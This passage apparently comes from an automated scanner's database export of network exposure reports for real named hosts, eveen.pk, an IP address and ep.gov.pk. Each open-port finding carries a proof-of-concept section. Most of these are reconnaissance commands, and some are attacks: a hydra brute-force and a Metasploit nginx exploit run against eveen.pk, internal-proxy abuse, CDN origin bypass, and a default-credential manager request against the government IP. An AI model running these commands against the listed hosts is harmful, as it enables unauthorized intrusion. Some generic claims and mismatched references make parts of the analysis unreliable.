Its presence indicates possible exposure of internal or staging systems directly to the internet.\n\n**Attack Scenario (Proof of Concept)**  \nAccessing the endpoint:\n```bash\ncurl http://23.227.38.65:8080\n```\nIf it returns content, attackers will analyze headers, directory listings, or error messages for clues about underlying technology stacks.\n\n**Business Impact**  \nMisconfigured reverse proxies or dev/test environments exposed to production networks pose risks of information disclosure, lateral movement, or bypassing perimeter defenses.\n\n**Remediation**  \n- Ensure no sensitive or internal-only resources are served on port 8080.\n- Implement WAF or rate-limiting protections.\n- Restrict external access unless explicitly required.\n\n---\n\n### Open Port 8008/tcp on 23.227.38.65\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 23.227.38.65 |\n\n**Description**  \nPort 8008/tcp is another non-standard HTTP port sometimes used for debugging, alternate web interfaces, or legacy systems. 
Like other non-standard ports, its exposure adds complexity to asset management and increases the chance that a vulnerability is discovered.\n\n**Attack Scenario (Proof of Concept)**  \nUsing telnet or curl:\n```bash\ntelnet 23.227.38.65 8008\n```\nOr:\n```bash\ncurl http://23.227.38.65:8008\n```\nAttackers look for default pages, debug outputs, or unauthenticated APIs.\n\n**Business Impact**  \nDebugging interfaces or test deployments left online can leak system internals, API keys, or source code fragments.\n\n**Remediation**  \n- Audit and decommission any temporary or testing services.\n- Block public access to non-production ports at the network level.\n- Enable logging and alerting for unexpected connections.\n\n---\n\n### Open Port 8020/tcp on 23.227.38.65\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 23.227.38.65 |\n\n**Description**  \nPort 8020/tcp is not assigned to any standard protocol and may run proprietary or custom applications. 
Unknown services represent blind spots in visibility and control.\n\n**Attack Scenario (Proof of Concept)**  \nNmap scan:\n```bash\nnmap -sV -p 8020 23.227.38.65\n```\nIf banner grabbing reveals service info, attackers may attempt fingerprinting or exploit known weaknesses.\n\n**Business Impact**  \nUndocumented or unsupported services introduce unpredictability and elevate risk of zero-day exploitation or insider threats.\n\n**Remediation**  \n- Identify and classify the service behind port 8020.\n- Apply principle of least privilege; disable if unnecessary.\n- Maintain updated inventories of all listening services.\n\n---\n\n### Open Port 8443/tcp on 23.227.38.65\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 23.227.38.65 |\n\n**Description**  \nPort 8443/tcp is frequently used as an alternative HTTPS port, especially when 443 is already occupied. It may serve administrative panels, API gateways, or third-party integrations.\n\n**Attack Scenario (Proof of Concept)**  \nConnecting securely:\n```bash\ncurl -k https://23.227.38.65:8443\n```\nIf valid SSL/TLS handshake occurs, attackers inspect certificate metadata and attempt to exploit vulnerabilities in TLS implementations or backend logic.\n\n**Business Impact**  \nImproperly configured SSL termination or backend services can lead to man-in-the-middle attacks, session hijacking, or exposure of sensitive data.\n\n**Remediation**  \n- Validate SSL certificates and enforce modern cipher suites.\n- Restrict access to necessary roles only.\n- Log and monitor traffic patterns for anomalies.\n\n---\n\n### Open Port 80/tcp on 23.227.38.65\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 23.227.38.65 |\n\n**Description**  \nHTTP service running on port 80/tcp is standard for 
serving websites. However, if not redirected to HTTPS, it exposes users to plaintext communication risks.\n\n**Attack Scenario (Proof of Concept)**  \nBasic connection:\n```bash\ncurl http://23.227.38.65\n```\nIf successful, attackers can intercept cookies, inject malicious scripts, or perform downgrade attacks.\n\n**Business Impact**  \nLack of encryption leads to eavesdropping, tampering, and potential compromise of user sessions or transmitted data.\n\n**Remediation**  \n- Redirect all HTTP requests to HTTPS using HSTS headers.\n- Enforce TLS 1.2+ across all endpoints.\n- Deploy Let’s Encrypt or enterprise-grade certificates.\n\n---\n\n### Open Port 443/tcp on 23.227.38.65\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 23.227.38.65 |\n\n**Description**  \nHTTPS service on port 443/tcp ensures encrypted communication between clients and the server. Proper implementation mitigates many passive and active network-based threats.\n\n**Attack Scenario (Proof of Concept)**  \nSecure browsing:\n```bash\ncurl -v https://23.227.38.65\n```\nAttackers may check for expired certs, weak protocols, or vulnerable cipher suites during reconnaissance.\n\n**Business Impact**  \nWell-configured HTTPS protects confidentiality and integrity. Misconfiguration, however, undermines trust and opens avenues for MITM attacks.\n\n**Remediation**  \n- Use tools like Qualys SSL Labs to assess TLS posture.\n- Renew certificates before expiration.\n- Disable deprecated protocols (SSLv3, TLS 1.0).\n\n---\n\n### Open Port 80/tcp (http) on eveen.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | eveen.pk |\n\n**Description**  \nThe domain `eveen.pk` listens on port 80/tcp for HTTP traffic. 
As with any HTTP endpoint, failure to redirect to HTTPS leaves communications vulnerable to interception.\n\n**Attack Scenario (Proof of Concept)**  \nBrowser navigation or CLI tool:\n```bash\ncurl http://eveen.pk\n```\nIf response includes forms or session tokens, attackers can capture them in transit.\n\n**Business Impact**  \nData transmitted over HTTP lacks protection, increasing susceptibility to credential theft, session fixation, and content injection.\n\n**Remediation**  \n- Implement automatic redirection from HTTP to HTTPS.\n- Set up HSTS header with preload directive.\n- Monitor for mixed-content warnings.\n\n---\n\n### Open Port 443/tcp (https) on eveen.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | eveen.pk |\n\n**Description**  \nHTTPS service on port 443/tcp provides encrypted communication for `eveen.pk`, ensuring privacy and authenticity. Correct deployment prevents most passive surveillance and some active attacks.\n\n**Attack Scenario (Proof of Concept)**  \nSecure request:\n```bash\ncurl -I https://eveen.pk\n```\nInspecting response headers helps identify issues like missing security headers or outdated TLS settings.\n\n**Business Impact**  \nProper HTTPS implementation enhances customer confidence and meets regulatory requirements for data protection.\n\n**Remediation**  \n- Periodically review TLS configurations and certificate validity.\n- Add Content-Security-Policy and X-Frame-Options headers.\n- Employ certificate pinning where feasible.\n\n---\n\n### Open Port 2052/tcp (http) – Cloudflare http proxy on eveen.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | eveen.pk |\n\n**Description**  \nPort 2052/tcp hosts a Cloudflare-managed HTTP proxy for `eveen.pk`. 
This setup allows CDN acceleration and DDoS mitigation but also introduces reliance on third-party infrastructure.\n\n**Attack Scenario (Proof of Concept)**  \nDirect access:\n```bash\ncurl http://eveen.pk:2052\n```\nAttackers may attempt to bypass Cloudflare protections by targeting origin servers directly.\n\n**Business Impact**  \nOver-reliance on CDNs without securing origins can undermine their benefits and leave gaps in defense layers.\n\n**Remediation**  \n- Lock down direct access to origin IPs.\n- Configure firewall rules to accept traffic only from Cloudflare ranges.\n- Monitor for attempts to reach origin outside CDN.\n\n---\n\n### Open Port 2053/tcp (http) – nginx on eveen.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | eveen.pk |\n\n**Description**  \nNginx serves HTTP traffic on port 2053/tcp for `eveen.pk`. Nginx is robust but requires careful tuning to avoid misconfigurations leading to information leakage or denial-of-service.\n\n**Attack Scenario (Proof of Concept)**  \nBanner grabbing:\n```bash\nnmap -sV -p 2053 eveen.pk\n```\nFollowed by probing for default paths or hidden files:\n```bash\ngobuster dir -u http://eveen.pk:2053 -w /usr/share/dirb/wordlists/common.txt\n```\n\n**Business Impact**  \nExposed web servers increase likelihood of path traversal, SSRF, or buffer overflow exploits depending on version and configuration.\n\n**Remediation**  \n- Keep Nginx updated to latest stable release.\n- Hide server version in responses (`server_tokens off;`).\n- Implement rate limiting and request filtering.\n\n---\n\n### Open Port 2082/tcp (http) – Cloudflare http proxy on eveen.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | eveen.pk |\n\n**Description**  \nAnother Cloudflare-managed HTTP proxy 
operates on port 2082/tcp. Multiple proxy ports suggest complex routing or legacy support structures which complicate security oversight.\n\n**Attack Scenario (Proof of Concept)**  \nEnumeration:\n```bash\nnmap -p 2082 eveen.pk\n```\nThen accessing:\n```bash\ncurl http://eveen.pk:2082\n```\nAttackers may compare behavior across different proxy ports to find inconsistencies or bypasses.\n\n**Business Impact**  \nMultiple ingress points multiply opportunities for misconfiguration and reduce clarity around who owns each service.\n\n**Remediation**  \n- Consolidate redundant proxy endpoints.\n- Document ownership and responsibilities clearly.\n- Regularly audit and retire obsolete ports.\n\n---\n\n### Open Port 2083/tcp (http) – nginx on eveen.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | eveen.pk |\n\n**Description**  \nThis instance of Nginx runs on port 2083/tcp, likely supporting secure webmail or admin functions. 
Given its association with cPanel, improper access controls could yield significant privileges.\n\n**Attack Scenario (Proof of Concept)**  \nBrute-force login attempts:\n```bash\nhydra -l admin -P passwords.txt eveen.pk http-get /login -s 2083\n```\nAlternatively, scanning for known vulnerabilities:\n```bash\nnikto -h http://eveen.pk:2083\n```\n\n**Business Impact**  \nCompromise of administrative portals enables full control over hosted domains, databases, and user accounts.\n\n**Remediation**  \n- Enforce two-factor authentication.\n- Rotate default credentials immediately after installation.\n- Restrict access geographically or by role.\n\n---\n\n### Open Port 2086/tcp (http) – Cloudflare http proxy on eveen.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | eveen.pk |\n\n**Description**  \nYet another Cloudflare-managed HTTP proxy on port 2086/tcp. Repeated use of similar proxy configurations suggests either intentional redundancy or poor architectural planning.\n\n**Attack Scenario (Proof of Concept)**  \nComparative analysis:\n```bash\ncurl -H \"Host: eveen.pk\" http://<origin_ip>:2086\n```\nAttackers seek differences in caching, routing, or security enforcement among various proxy ports.\n\n**Business Impact**  \nInconsistent proxy behaviors create exploitable discrepancies that adversaries can leverage to evade detection or bypass restrictions.\n\n**Remediation**  \n- Standardize proxy configurations across all ports.\n- Centralize logging and monitoring for all edge nodes.\n- Retire unused or duplicate proxy instances.\n\n---\n\n### Open Port 2087/tcp (http) – nginx on eveen.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | eveen.pk |\n\n**Description**  \nRunning Nginx on port 2087/tcp implies yet another 
distinct service layer. With multiple Nginx instances, coordination becomes critical to prevent conflicting policies or overlapping responsibilities.\n\n**Attack Scenario (Proof of Concept)**  \nVersion-specific exploit testing:\n```bash\nsearchsploit nginx <version>\n```\nThen crafting targeted payloads:\n```bash\nmsfconsole -q -x 'use exploit/linux/http/nginx_chunked_size; set RHOSTS eveen.pk; set RPORT 2087; run'\n```\n\n**Business Impact**  \nOutdated or poorly maintained Nginx installations are susceptible to remote code execution, memory corruption, or DoS conditions.\n\n**Remediation**  \n- Automate updates and patch cycles.\n- Harden Nginx configurations with security modules.\n- Conduct regular penetration tests focusing on web stack components.\n\n---\n\n### Open Port 2095/tcp (http) – Cloudflare http proxy on eveen.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | eveen.pk |\n\n**Description**  \nAs previously noted, port 2095/tcp usually relates to cPanel webmail. 
When fronted by Cloudflare, additional considerations arise regarding caching, origin shielding, and access logging.\n\n**Attack Scenario (Proof of Concept)**  \nBypassing Cloudflare:\n```bash\ndig +short A eveen.pk\n# Then connecting directly to returned IP(s)\ncurl http://<origin_ip>:2095\n```\nAttackers aim to circumvent WAF protections or abuse misrouted traffic.\n\n**Business Impact**  \nOrigin bypasses nullify CDN advantages and expose raw backend infrastructure to direct attacks.\n\n**Remediation**  \n- Prevent DNS resolution of origin IPs.\n- Enforce strict hostname validation in Nginx/Virtual Host configs.\n- Monitor for unusual spikes in direct-to-origin traffic.\n\n---\n\n### Open Port 2096/tcp (http) – nginx on eveen.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | eveen.pk |\n\n**Description**  \nPort 2096/tcp typically serves cPanel’s secure webmail interface. 
Hosting this on Nginx rather than Apache may imply customization or containerization efforts requiring extra scrutiny.\n\n**Attack Scenario (Proof of Concept)**  \nDirectory enumeration:\n```bash\ndirb http://eveen.pk:2096 /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt\n```\nFollowed by form-based attacks or XSS injection attempts.\n\n**Business Impact**  \nWebmail interfaces contain highly sensitive personal and business correspondence, making them prime targets for espionage or blackmail.\n\n**Remediation**  \n- Sanitize input fields rigorously.\n- Apply Content Security Policy (CSP) headers.\n- Educate users on recognizing phishing attempts.\n\n---\n\n### Open Port 8008/tcp (http) on eveen.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | eveen.pk |\n\n**Description**  \nPort 8008/tcp again appears here for `eveen.pk`, reinforcing earlier concerns about inconsistent service mapping and unclear architectural boundaries.\n\n**Attack Scenario (Proof of Concept)**  \nReconnaissance:\n```bash\nwhatweb http://eveen.pk:8008\n```\nIdentifying technologies used facilitates targeted exploitation strategies.\n\n**Business Impact**  \nAmbiguous service roles hinder incident response and increase time-to-detection for breaches involving obscure ports.\n\n**Remediation**  \n- Map and label all services comprehensively.\n- Establish naming conventions and documentation standards.\n- Decommission redundant or undocumented services promptly.\n\n---\n\n### Open Port 8015/tcp (http-proxy) — FortiGuard Web Filtering / eveen.pk / eveen.pk:8015\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | eveen.pk |\n\n**Description**  \nPort 8015/tcp is open and identified by Nmap as running an HTTP proxy service associated with 
Fortinet's FortiGuard Web Filtering solution. This configuration typically indicates that the system acts as a forward or reverse proxy for filtering web traffic. While not inherently insecure, exposing such services directly on public interfaces can provide attackers with insight into internal infrastructure or potentially bypass access controls if misconfigured.\n\nThe presence of this port may indicate that the organization uses Fortinet appliances for content filtering or secure web gateway functionality. Attackers often scan for known proxy ports to identify intermediary systems that might allow them to relay malicious traffic or probe internal networks indirectly.\n\n**Attack Scenario (Proof of Concept)**  \nAn attacker performs reconnaissance using tools like `nmap` or `proxycheck` to detect open proxies:\n\n```bash\nnmap -p 8015 --script http-open-proxy eveen.pk\n```\n\nIf successful, they may attempt to route traffic through the proxy:\n\n```bash\ncurl --proxy http://eveen.pk:8015 http://internal-service.local\n```\n\nThis could lead to unauthorized access to internal resources or abuse of the proxy for anonymizing attacks.\n\n**Business Impact**  \nExposing internal proxy services increases the attack surface and provides potential pathways for lateral movement within the network. 
If improperly configured, these endpoints can be abused for data exfiltration, scanning internal hosts, or launching further targeted attacks against backend systems.\n\n**Remediation**  \n- Restrict access to port 8015/tcp at the firewall level to only trusted IP ranges.\n- Ensure that the FortiGuard Web Filtering appliance is properly hardened and updated.\n- Disable unnecessary proxy exposure unless explicitly required for business operations.\n- Monitor logs from Fortinet devices for signs of misuse.\n- Reference: CWE-16 (Configuration), NIST SP 800-53 SC-7 (Boundary Protection)\n\n---\n\n### Open Port 8020/tcp (http-proxy) — FortiGuard Web Filtering / eveen.pk / eveen.pk:8020\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | eveen.pk |\n\n**Description**  \nSimilar to port 8015, port 8020/tcp is also identified as hosting an HTTP proxy linked to Fortinet’s FortiGuard Web Filtering platform. The dual presence of multiple proxy ports suggests either redundancy, segmentation, or different policy zones managed by the same device. 
These ports should be reviewed for necessity and restricted appropriately.\n\nSuch configurations are common in enterprise environments but pose risks when exposed without proper authentication or logging mechanisms.\n\n**Attack Scenario (Proof of Concept)**  \nUsing automated scanning tools such as Burp Suite or custom scripts, an attacker identifies both 8015 and 8020 as active proxies:\n\n```bash\nfor port in 8015 8020; do\n  curl -x http://eveen.pk:$port http://example.com\ndone\n```\n\nThey then test whether internal addresses can be accessed via the proxy:\n\n```bash\ncurl -x http://eveen.pk:8020 http://192.168.1.10/admin\n```\n\nSuccessful responses indicate improper restrictions and possible internal reconnaissance opportunities.\n\n**Business Impact**  \nUnauthorized use of exposed proxy services can result in unauthorized access to sensitive internal applications, violation of compliance requirements, and increased risk of data breaches due to indirect exploitation paths.\n\n**Remediation**  \n- Audit all proxy-enabled ports and remove those not essential for operation.\n- Implement strict ACLs limiting access to authorized users or systems.\n- Enable detailed logging and alerting for proxy usage anomalies.\n- Regularly update firmware and review default configurations on Fortinet appliances.\n- Reference: CWE-16, NIST SP 800-53 AC-4 (Information Flow Enforcement)\n\n---\n\n### Open Port 8080/tcp (http) — Cloudflare http proxy / eveen.pk / eveen.pk:8080\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | eveen.pk |\n\n**Description**  \nPort 8080/tcp is open and identified as being served by a Cloudflare HTTP proxy. This implies that the domain is fronted by Cloudflare’s CDN or security services, which intercept and forward requests to origin servers. 
However, direct access to this port outside of standard routing (e.g., bypassing DNS resolution) may expose backend infrastructure details or misconfigurations.\n\nWhile Cloudflare generally enhances security, exposing alternative ports like 8080 without appropriate safeguards can undermine its protective benefits.\n\n**Attack Scenario (Proof of Concept)**  \nAn attacker attempts to connect directly to the origin server behind Cloudflare:\n\n```bash\ncurl -H \"Host: eveen.pk\" http://[origin_ip]:8080/\n```\n\nAlternatively, they may try to enumerate subdomains or hidden services hosted on non-standard ports:\n\n```bash\nffuf -u http://eveen.pk:8080/FUZZ -w wordlist.txt\n```\n\nIf successful, this could reveal unprotected administrative panels or staging environments.\n\n**Business Impact**  \nBypassing Cloudflare protections exposes backend infrastructure to direct probing and exploitation. It undermines DDoS mitigation, WAF rules, and rate-limiting policies enforced at the edge layer.\n\n**Remediation**  \n- Block direct access to origin IPs on non-standard ports using firewall rules.\n- Configure origin servers to reject requests not routed through Cloudflare.\n- Enforce mutual TLS between Cloudflare and origin servers where feasible.\n- Review Cloudflare settings to ensure no unintended ports are exposed publicly.\n- Reference: CWE-16, OWASP API1:2019 – Broken Object Level Authorization\n\n---\n\n### Open Port 8443/tcp (http) — Cloudflare http proxy / eveen.pk / eveen.pk:8443\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | eveen.pk |\n\n**Description**  \nPort 8443/tcp is open and recognized as another instance of a Cloudflare-managed HTTP proxy, likely serving HTTPS traffic. Commonly used as an alternative SSL/TLS endpoint, this port may host legacy or secondary services. 
Its visibility increases the likelihood of enumeration and targeted attacks aimed at identifying weak points in the TLS setup or backend logic.\n\nMisconfiguration here could allow attackers to downgrade connections or exploit outdated cipher suites.\n\n**Attack Scenario (Proof of Concept)**  \nAn attacker tests for SSL/TLS vulnerabilities on port 8443:\n\n```bash\nsslscan eveen.pk:8443\n```\n\nThey may also check for certificate mismatches or expired certificates:\n\n```bash\nopenssl s_client -connect eveen.pk:8443 -servername eveen.pk\n```\n\nAdditionally, they might attempt to access internal APIs or debug endpoints:\n\n```bash\ncurl -k https://eveen.pk:8443/api/debug\n```\n\nAny success indicates poor hardening practices and potential entry vectors.\n\n**Business Impact**  \nImproper handling of encrypted communications can lead to man-in-the-middle attacks, credential theft, and exposure of sensitive user data. Regulatory violations related to encryption standards (PCI-DSS, HIPAA) may occur if insecure protocols are detected.\n\n**Remediation**  \n- Disable support for deprecated TLS versions (<1.2).\n- Enforce strong cipher suites and disable weak algorithms.\n- Redirect all traffic to port 443 where possible.\n- Regularly audit SSL/TLS configurations using tools like Mozilla Observatory or Qualys SSL Labs.\n- Reference: CWE-327 (Use of Weak Cryptographic Algorithm), OWASP A03:2017 – Sensitive Data Exposure\n\n---\n\n### Open Port 8880/tcp (http) — Cloudflare http proxy / eveen.pk / eveen.pk:8880\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | eveen.pk |\n\n**Description**  \nPort 8880/tcp is open and attributed to a Cloudflare HTTP proxy. Often used for development, testing, or alternate routing scenarios, this port may serve non-production content or act as a fallback path. 
Public accessibility introduces additional risk surfaces, especially if it serves less-protected or debug-oriented interfaces.\n\nOrganizations sometimes overlook securing auxiliary ports during deployment cycles, making them attractive targets for initial compromise stages.\n\n**Attack Scenario (Proof of Concept)**  \nAn attacker scans for accessible debug pages or developer consoles:\n\n```bash\ndirb http://eveen.pk:8880 /usr/share/dirb/wordlists/common.txt\n```\n\nThey may also look for version disclosures or error messages indicating underlying frameworks:\n\n```bash\ncurl -v http://eveen.pk:8880/\n```\n\nIf found, these artifacts can guide more sophisticated follow-up attacks targeting specific software flaws.\n\n**Business Impact**  \nUnsecured auxiliary ports increase the probability of early-stage compromises, including information leakage about internal architecture, credentials embedded in source code, or access to management dashboards.\n\n**Remediation**  \n- Remove or restrict access to non-critical ports like 8880 unless absolutely necessary.\n- Apply consistent authentication and authorization across all application layers.\n- Conduct regular penetration tests focused on identifying shadow IT assets.\n- Implement centralized monitoring and alerting for anomalous access patterns on non-standard ports.\n- Reference: CWE-16, OWASP ASVS v4.0 – V1 Architecture, Design and Threat Modeling Requirements","summary":{"total":25}},"summary":{"total":25}},{"_id":{"$oid":"6a0f60cb12f44e6c4312c4ea"},"created_at":{"$date":"2026-05-21T19:45:15.424Z"},"url":"https://ep.gov.pk/","tool":"generate_network_exposure_report","result":{"url":"https://ep.gov.pk/","category":"network_exposure","timestamp":"2026-05-21T19:45:15.418640+00:00","report":"### Open Port 8020/tcp on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 124.109.52.82 
|\n\n**Description**  \nPort 8020/TCP is open on the host at IP address `124.109.52.82`. This port is commonly associated with services such as Apache Tomcat AJP (Apache JServ Protocol), which typically runs on ports like 8009 or 8020 depending on configuration. An open port indicates that a service is actively listening for incoming connections. While not inherently insecure, exposing non-standard HTTP or application-specific ports increases the attack surface by providing additional entry points for reconnaissance and exploitation.\n\nAn attacker can use tools like Nmap or Masscan to enumerate open ports and then proceed with targeted fingerprinting using banners or protocol-specific probes.\n\n**Attack Scenario (Proof of Concept)**  \nA malicious actor performs initial reconnaissance using Nmap:\n\n```bash\nnmap -p 8020 -sV 124.109.52.82\n```\n\nIf the service responds with an identification such as \"Apache Tomcat\" or similar, they may attempt further probing via crafted AJP requests or exploit known vulnerabilities related to exposed management interfaces.\n\nExample payload targeting potential misconfigured AJP connector:\n```http\nGET /manager/html HTTP/1.1\nHost: 124.109.52.82:8020\nAuthorization: Basic YWRtaW46YWRtaW4=\n```\n\nThis could lead to unauthorized access if default credentials are used or if authentication has been disabled.\n\n**Business Impact**  \nExposing internal administrative or backend communication protocols increases risk of compromise due to unpatched software, weak configurations, or credential exposure. 
Even though this finding itself does not indicate a vulnerability, it contributes to information leakage and expands the scope for lateral movement within the infrastructure.\n\n**Remediation**  \n- Restrict access to port 8020 from external networks using firewall rules.\n- If AJP functionality is required internally only, bind the service to localhost (`127.0.0.1`) instead of all interfaces.\n- Disable unnecessary connectors in server configuration files (e.g., `server.xml` for Tomcat).\n- Regularly audit exposed services and ensure they align with business requirements.\n\nReference: CWE-16 – Configuration\n\n---\n\n### Open Port 8015/tcp on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 124.109.52.82 |\n\n**Description**  \nPort 8015/TCP is open on the system located at `124.109.52.82`. This port is often used by custom applications, middleware systems, or development environments but lacks standardization. Its presence suggests either a bespoke web service or auxiliary component tied to another primary service running on the host. 
Without proper context or documentation, identifying its purpose requires active probing and banner grabbing techniques.\n\nAttackers frequently scan ranges of high-numbered TCP ports to discover hidden or undocumented services that might have weaker security controls than standard ones.\n\n**Attack Scenario (Proof of Concept)**  \nUsing curl or netcat to probe the endpoint:\n\n```bash\ncurl http://124.109.52.82:8015/\nnc -zv 124.109.52.82 8015\n```\n\nIf a response is returned indicating a web-based interface or API, attackers will analyze headers, paths, and endpoints for signs of vulnerable components or debug features enabled in production.\n\nFor instance, requesting `/status`, `/health`, or `/debug/pprof` endpoints common in GoLang or Node.js apps may yield sensitive runtime diagnostics.\n\n**Business Impact**  \nUnintended disclosure of internal services exposes organizations to risks including unauthorized data access, denial-of-service conditions, or privilege escalation opportunities. It also complicates compliance audits where visibility into all listening services is mandatory.\n\n**Remediation**  \n- Identify and document the service bound to port 8015.\n- Remove or restrict public accessibility unless explicitly required.\n- Apply principle of least privilege when configuring network listeners.\n- Implement centralized logging and monitoring around unusual port activity.\n\nReference: CWE-16 – Configuration\n\n---\n\n### Open Port 8008/tcp on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 124.109.52.82 |\n\n**Description**  \nThe discovery of an open port 8008/TCP on `124.109.52.82` indicates that some form of service—potentially an alternative HTTP listener—is accepting inbound traffic. 
Historically, port 8008 was designated for HTTP Alternate, although modern usage varies widely across different platforms and frameworks. Commonly seen in embedded devices, IoT appliances, or containerized microservices, this port should be treated with caution during assessments.\n\nReconnaissance tools such as Shodan or direct scanning can easily detect such services, making them targets for automated attacks.\n\n**Attack Scenario (Proof of Concept)**  \nAn attacker initiates a basic GET request to determine the nature of the service:\n\n```bash\ncurl -I http://124.109.52.82:8008\n```\n\nIf it returns a valid HTTP status code along with headers like `Server: lighttpd` or `X-Powered-By`, more advanced enumeration begins. They may try accessing well-known paths like `/admin`, `/config`, or `/api`.\n\nAlternatively, sending malformed input could expose stack traces or error pages revealing underlying technologies or versions susceptible to exploits.\n\n**Business Impact**  \nInsecure deployment practices leading to unintended exposure of alternate HTTP interfaces increase organizational risk profiles significantly. These interfaces often lack robust authentication mechanisms or logging capabilities compared to mainline services.\n\n**Remediation**  \n- Confirm whether port 8008 serves a legitimate business function; remove otherwise.\n- Enforce strong authentication and encryption (HTTPS) if accessible externally.\n- Audit and harden service configurations against insecure defaults.\n- Monitor logs for anomalous access patterns indicative of probing behavior.\n\nReference: CWE-16 – Configuration\n\n---\n\n### Open Port 443/tcp on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description**  \nPort 443/TCP is open on the asset `124.109.52.82`, corresponding to the domain `https://ep.gov.pk/`. 
